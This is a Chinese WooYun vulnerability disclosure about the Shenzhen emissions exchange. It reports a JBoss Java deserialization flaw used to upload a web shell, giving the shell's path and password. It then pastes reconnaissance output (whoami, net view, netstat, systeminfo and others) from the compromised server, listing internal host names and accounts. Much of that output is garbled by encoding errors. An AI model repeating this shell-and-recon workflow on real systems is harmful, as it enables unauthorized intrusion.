乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-05: 细节已通知厂商并且等待厂商处理中 2016-01-08: 厂商已经确认,细节仅向厂商公开 2016-01-18: 细节向核心白帽子及相关领域专家公开 2016-01-28: 细节向普通白帽子公开 2016-02-07: 细节向实习白帽子公开 2016-02-20: 细节向公众公开
2010年9月30日,以深圳成为国家首批低碳试点城市为契机,经深圳市人民政府批准,深圳排放权交易所(以下简称“交易所”)成立。 在深圳市政府的支持下,交易所于2012年4月完成增资扩股, 注册资本金从一千五百万元增加至三亿元,成为国内同类交易所中注册资本金额最大的交易所。股东增加到九家,深圳市国资委资本运作专业平台—深圳市远致投资有限公司成为第一大股东,另八家股东分别为:中广核风电有限公司、大唐华银电力股份有限公司、普天新能源有限责任公司、深圳市盐田港集团有限公司、深圳能源集团股份有限公司、深圳国家高技术产业创新中心、深圳联合产权交易所和深圳市特区建设发展集团有限公司。
打开官网http://**.**.**.**/,图中标识存在漏洞
地址http://**.**.**.**/存在“Java 反序列化”漏洞
直接上传木马到服务器中
http://**.**.**.**/jmx-console/tst.jsp密码123
C:\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>whoami============================================================================================================rxxbs-web-1\administratorC:\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>net view============================================================================================================r���������� ע��-------------------------------------------------------------------------------\\CEEX-41BE85859D \\CEEX-TW \\CEEX-XXBS \\CEEX-ZCJK \\DJBDB1 \\DJBDB2 \\HQ-KCBP-1 \\HQ-KCXP-1 \\HQ-SERVER-1 \\HQ-SERVER-2 \\HQKCBP-2 \\HQKCXP-2 \\HQZM-1 \\HQZM-2 \\JYKCBP-1 \\JYKCBP-2 \\JYKCBP-3 \\JYKCXP-2 \\JYWZ-DB \\JYXT-KCXP-1 \\JYXT-KCXP-3 \\MANAGE-SERVER \\SZETS-WEB \\WIN-OALNHNLJAHV \\XXBS-WEB-1 \\XXBS-WEB-2 \\XXBSDB1 \\XXBSDB2 \\YHJKSERVER-1 \\YHTK-2 \\ZH-SERVER-1 \\ZH-SERVER-2 ����ɹ���ɡ�C:\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>net share============================================================================================================r������ ��Դ ע��-------------------------------------------------------------------------------IPC$ Զ�� IPC ADMIN$ C:\WINDOWS Զ�̹��� D$ D:\ Ĭ�Ϲ��� C$ C:\ Ĭ�Ϲ��� ����ɹ���ɡ�C:\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>net user============================================================================================================r\\XXBS-WEB-1 ���û��ʻ�-------------------------------------------------------------------------------Administrator Guest SUPPORT_388945a0 ����ɹ���ɡ�C:\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>netstat -ano============================================================================================================rActive Connections Proto Local Address Foreign Address State PID TCP **.**.**.**:135 **.**.**.**:0 LISTENING 684 TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1025 **.**.**.**:0 LISTENING 448 TCP **.**.**.**:1793 **.**.**.**:0 LISTENING 5992 TCP **.**.**.**:1794 **.**.**.**:0 LISTENING 5992 TCP **.**.**.**:1796 **.**.**.**:0 LISTENING 5992 TCP **.**.**.**:3389 **.**.**.**:0 LISTENING 1800 TCP **.**.**.**:5152 **.**.**.**:0 LISTENING 1192 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:80 **.**.**.**:0 LISTENING 5992 TCP **.**.**.**:80 **.**.**.**:1954 TIME_WAIT 0 TCP **.**.**.**:80 **.**.**.**:4891 FIN_WAIT_2 5992 TCP **.**.**.**:80 **.**.**.**:4896 ESTABLISHED 5992 TCP **.**.**.**:80 **.**.**.**:60000 TIME_WAIT 0 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:2098 **.**.**.**:0 LISTENING 5992 TCP **.**.**.**:2099 **.**.**.**:0 LISTENING 5992 TCP **.**.**.**:3873 **.**.**.**:0 LISTENING 5992 TCP **.**.**.**:4444 **.**.**.**:0 LISTENING 5992 TCP **.**.**.**:4445 **.**.**.**:0 LISTENING 5992 TCP **.**.**.**:4446 **.**.**.**:0 LISTENING 5992 TCP **.**.**.**:8009 **.**.**.**:0 LISTENING 5992 TCP **.**.**.**:8083 **.**.**.**:0 LISTENING 5992 TCP **.**.**.**:8093 **.**.**.**:0 LISTENING 5992 TCP **.**.**.**:8443 **.**.**.**:0 LISTENING 5992 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:3125 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3126 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3127 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3128 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3129 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3130 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3131 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3132 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3133 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3134 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3135 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3136 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3137 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3138 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3139 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3140 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3141 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3142 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3143 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3144 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3145 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3146 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3147 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:3148 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3149 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3150 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3151 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3152 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3153 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3154 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3163 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3164 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3165 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3166 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3167 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3168 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3169 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3170 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3171 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3172 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3173 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3174 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3175 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3176 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3177 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3178 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3179 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3180 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3181 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3182 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3183 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3184 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:3185 **.**.**.**:1521 ESTABLISHED 5992 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:3156 **.**.**.**:8014 ESTABLISHED 1816 TCP **.**.**.**:3162 **.**.**.**:139 TIME_WAIT 0 UDP **.**.**.**:445 *:* 4 UDP **.**.**.**:500 *:* 448 UDP **.**.**.**:4500 *:* 448 UDP **.**.**.**:123 *:* 772 UDP **.**.**.**:1026 *:* 772 UDP **.**.**.**:1032 *:* 1816 UDP **.**.**.**:123 *:* 772 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4 UDP **.**.**.**:123 *:* 772 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4 UDP **.**.**.**:123 *:* 772 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4 UDP **.**.**.**:123 *:* 772 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4C:\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>ipconfig /all============================================================================================================rWindows IP Configuration Host Name . . . . . . . . . . . . : xxbs-web-1 Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : NoEthernet adapter ��������: Media State . . . . . . . . . . . : Media disconnected Description . . . . . . . . . . . : Intel(R) 82576 Gigabit Dual Port Network Connection Physical Address. . . . . . . . . : 00-E0-ED-24-9F-B0Ethernet adapter Port 6: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) 82576 Gigabit Dual Port Network Connection #2 Physical Address. . . . . . . . . : 00-E0-ED-24-9F-B1 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : **.**.**.** Subnet Mask . . . . . . . . . . . : **.**.**.** Default Gateway . . . . . . . . . : Ethernet adapter port 2: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) 82580 Gigabit Network Connection #2 Physical Address. . . . . . . . . : AC-4E-91-45-CE-30 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : **.**.**.** Subnet Mask . . . . . . . . . . . : **.**.**.** Default Gateway . . . . . . . . . : Ethernet adapter port 1: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) 82580 Gigabit Network Connection Physical Address. . . . . . . . . : AC-4E-91-45-CE-2F DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : **.**.**.** Subnet Mask . . . . . . . . . . . : **.**.**.** Default Gateway . . . . . . . . . : **.**.**.**Ethernet adapter �������� 3: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) 82580 Gigabit Network Connection #3 Physical Address. . . . . . . . . : AC-4E-91-45-CE-31 DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes Autoconfiguration IP Address. . . : **.**.**.** Subnet Mask . . . . . . . . . . . : **.**.**.** Default Gateway . . . . . . . . . : C:\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>tasklist /svc============================================================================================================rӳ������ PID ���� ========================= ======== ============================================System Idle Process 0 ��ȱ System 4 ��ȱ smss.exe 312 ��ȱ csrss.exe 364 ��ȱ winlogon.exe 388 ��ȱ services.exe 436 Eventlog, PlugPlay lsass.exe 448 PolicyAgent, ProtectedStorage, SamSs svchost.exe 620 DcomLaunch svchost.exe 684 RpcSs svchost.exe 756 Dhcp, Dnscache svchost.exe 772 LmHosts, W32Time svchost.exe 788 AeLookupSvc, Browser, CryptSvc, dmserver, EventSystem, helpsvc, lanmanserver, lanmanworkstation, Netman, Nla, Schedule, seclogon, SENS, ShellHWDetection, TrkWks, winmgmt, wuauserv, WZCSVC spoolsv.exe 960 Spooler msdtc.exe 996 MSDTC svchost.exe 1112 ERSvc IPROSetMonitor.exe 1160 Intel(R) PROSet Monitoring Service jqs.exe 1192 JavaQuickStarterService svchost.exe 1236 RemoteRegistry ccSvcHst.exe 1268 SepMasterService svchost.exe 1800 TermService Smc.exe 1816 SmcService csrss.exe 2740 ��ȱ winlogon.exe 2768 ��ȱ wmiprvse.exe 2896 ��ȱ rdpclip.exe 3128 ��ȱ ctfmon.exe 3196 ��ȱ explorer.exe 3204 ��ȱ jusched.exe 3344 ��ȱ ccSvcHst.exe 3604 ��ȱ conime.exe 3804 ��ȱ logon.scr 2192 ��ȱ wmiprvse.exe 2512 ��ȱ csrss.exe 328 ��ȱ winlogon.exe 208 ��ȱ rdpclip.exe 216 ��ȱ explorer.exe 1492 ��ȱ jusched.exe 2588 ��ȱ ctfmon.exe 2648 ��ȱ ccSvcHst.exe 4148 ��ȱ taskmgr.exe 6116 ��ȱ cmd.exe 5668 ��ȱ java.exe 5992 ��ȱ SavUI.exe 5288 ��ȱ tasklist.exe 4872 ��ȱ C:\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>net start============================================================================================================r�Ѿ�������� Windows ����: Application Experience Lookup Service Automatic Updates COM+ Event System Computer Browser Cryptographic Services DCOM Server Process Launcher DHCP Client Distributed Link Tracking Client Distributed Transaction Coordinator DNS Client Error Reporting Service Event Log Help and Support Intel(R) PROSet Monitoring Service IPSEC Services Java Quick Starter Logical Disk Manager Network Connections Network Location Awareness (NLA) Plug and Play Print Spooler Protected Storage Remote Procedure Call (RPC) Remote Registry Secondary Logon Security Accounts Manager Server Shell Hardware Detection Symantec Endpoint Protection Symantec Management Client System Event Notification Task Scheduler TCP/IP NetBIOS Helper Terminal Services Windows Management Instrumentation Windows Time Wireless Configuration Workstation����ɹ���ɡ�C:\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>systeminfo============================================================================================================r������: XXBS-WEB-1OS ����: Microsoft(R) Windows(R) Server 2003, Enterprise EditionOS �汾: 5.2.3790 Service Pack 2 Build 3790OS ������: Microsoft CorporationOS ����: ����������OS ��������: Multiprocessor Freeע���������: ceexע�����֯: ceex��Ʒ ID: 69813-640-9722366-45600��ʼ��װ����: 2014-3-14, 9:07:56ϵͳ���ʱ��: 69 �� 7 Сʱ 51 �� 24 ��ϵͳ������: Huawei Technologies Co., Ltd.ϵͳ�ͺ�: Tecal RH2288 V2-8Sϵͳ����: X86-based PC������: ��װ�� 24 ���������� [01]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~1999 Mhz [02]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~1999 Mhz [03]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~1999 Mhz [04]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~2000 Mhz [05]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~2000 Mhz [06]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~2000 Mhz [07]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~2000 Mhz [08]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~2000 Mhz [09]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~1999 Mhz [10]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~2000 Mhz [11]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~1999 Mhz [12]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~1999 Mhz [13]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~2000 Mhz [14]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~2000 Mhz [15]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~2000 Mhz [16]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~2000 Mhz [17]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~1999 Mhz [18]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~2000 Mhz [19]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~2000 Mhz [20]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~1999 Mhz [21]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~2000 Mhz [22]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~1999 Mhz [23]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~1999 Mhz [24]: x86 Family 6 Model 45 Stepping 7 GenuineIntel ~2000 MhzBIOS �汾: INSYDE - 1Windows Ŀ¼: C:\WINDOWSϵͳĿ¼: C:\WINDOWS\system32����豸: \Device\HarddiskVolume1ϵͳ��������: zh-cn;����(�й�)���뷨��������: zh-cn;����(�й�)ʱ��: (GMT+08:00) ���������죬����ر�����������³ľ�������ڴ�����: 32,739 MB���õ������ڴ�: 30,979 MBҳ���ļ�: ���ֵ: 34,412 MBҳ���ļ�: ����: 32,207 MBҳ���ļ�: ʹ����: 2,205 MBҳ���ļ�λ��: C:\pagefile.sys��: WORKGROUP��¼������: \\XXBS-WEB-1������: ��װ�� 1 �������� [01]: Q147222����: ��װ�� 5 �� NIC�� [01]: Intel(R) 82576 Gigabit Dual Port Network Connection ������: �������� ״̬: ý���������ж� [02]: Intel(R) 82576 Gigabit Dual Port Network Connection ������: Port 6 ���� DHCP: �� IP ��ַ [01]: **.**.**.** [03]: Intel(R) 82580 Gigabit Network Connection ������: port 1 ���� DHCP: �� IP ��ַ [01]: **.**.**.** [04]: Intel(R) 82580 Gigabit Network Connection ������: port 2 ���� DHCP: �� IP ��ַ [01]: **.**.**.** [05]: Intel(R) 82580 Gigabit Network Connection ������: �������� 3 ���� DHCP: �� DHCP ������: **.**.**.** IP ��ַ [01]: **.**.**.**C:\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>query user============================================================================================================r �û��� �Ự�� ID ״̬ ����ʱ�� ��¼ʱ��>administrator 1 ��Ƭ �� 2015-10-26 16:49 administrator 2 ��Ƭ �� 2015-12-23 16:43C:\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>
加强安全意识
危害等级:中
漏洞Rank:5
确认时间:2016-01-08 10:55
非常感谢您的报告。报告中的问题已确认并复现.影响的数据:中攻击成本:低造成影响:中综合评级为:中,rank:5正在联系相关网站管理单位处置。
暂无
